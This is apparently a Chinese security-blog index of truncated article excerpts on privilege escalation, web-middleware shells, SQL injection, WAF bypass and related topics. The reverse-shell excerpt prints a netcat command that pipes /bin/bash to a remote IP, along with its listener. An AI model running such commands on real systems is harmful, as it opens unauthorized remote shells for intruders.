公众号:安全客资讯平台(ID:anquanbobao)作者:osword前言前几天审计某cms基于ThinkPHP5.0.24开发,反序列化没有可以较好的利用链,这里分享下挖掘ThinkPHP5.0....
打造python web 框架(三): Python WSGI架构升级
本文主要讲web框架架构会有两种形式,一种装饰器和另外一种正则表达式实现路由。装饰器创建WSGI服务类class WSGIapp(object):# 初始化路由routesdef ...
常见java WEB中间件获取shell
中间件(英语:Middleware)是提供系统软件和应用软件之间连接的软件,以便于软件各部件之间的沟通,特别是应用软件对于系统软件的集中的逻辑,在现代信息技术应用框架如Web服务、面向服务的体系结构等...
Linux下反弹的10种方法
方法1.SHELL执行: nc 192.168.1.133 8080 -e /bin/bash监听执行 :nc -n -vv -l -p 8080方法2:SHELL执行:mknod backpipe...
小记t00ls某人的悬赏:一次对星外的提权
文章前提https://www.t00ls.net/viewthread.php?tid=20728T00ls.Net - 低调求发展 - 技术无止境 - Focus On Network Secur...
某服务器被黑,“MMC无法创建管理单元”的恢复技巧
某服务器被扫肉鸡的黑客黑了,上去以后发现任务管理器无法使用,taskkill等命令均无法使用。几个跑1433弱口令的工具跑着。net user 一下看到有hacker$的帐户。“计算机管理”里“本地用...
渗透Oracle 11g
一. 漏洞概要漏洞描述: Oralce内部的一些存储过程或是函数存在SQL注入漏洞,利用这些漏洞我们可以将我们要执行的SQL语句或是危险函数注入到存储过程当中执行。受影...
【奇技淫巧】windows下可以通过wmic获取进程安装路径
查询mysql路径:wmic process where(description="mysqld.exe") >> mysql.log输出到当前目录下wmic process where(...
【奇技淫巧】实战过云锁提权
点击上方“T00ls”可以订阅哦我上次 发了一个过云锁的 我感觉好尴尬啊 想复杂了 我估计很多人知道这个方法了 但还是发出来 希望大家提供更多的思路 其实很普通云锁还是 老套路 ...
pipePotato复现
今天见安全客发了篇"首发披露!pipePotato:一种新型的通用提权漏洞"的文章,找了找资料复现了一下这里是原文对于漏洞的简介,废话不多说直接起环境开始复现。这里用到的环境是Windows Serv...
网安法实施半年来执法趋势和未来发展概述
点击上方蓝色“赛博星人”关注我们概述:自2017年6月1日《网络安全法》(以下简称“网安法”)正式实施以来,尽管相应的重要实施细则尚未出台,但各监管部门并未因此迟疑或推迟在全国范围内展开相关执法行动。...
Wo~ 反情报
黑产花钱买情报的故事已经听过很多次了,虽然讽刺,但却不算稀奇了。自打情报能拿出来单卖的那天开始,就已经多次在听这样的故事了。这也算得上是一种反情报了。然而 … 反情报不仅仅停留你买、我买、大家买的层面...
27861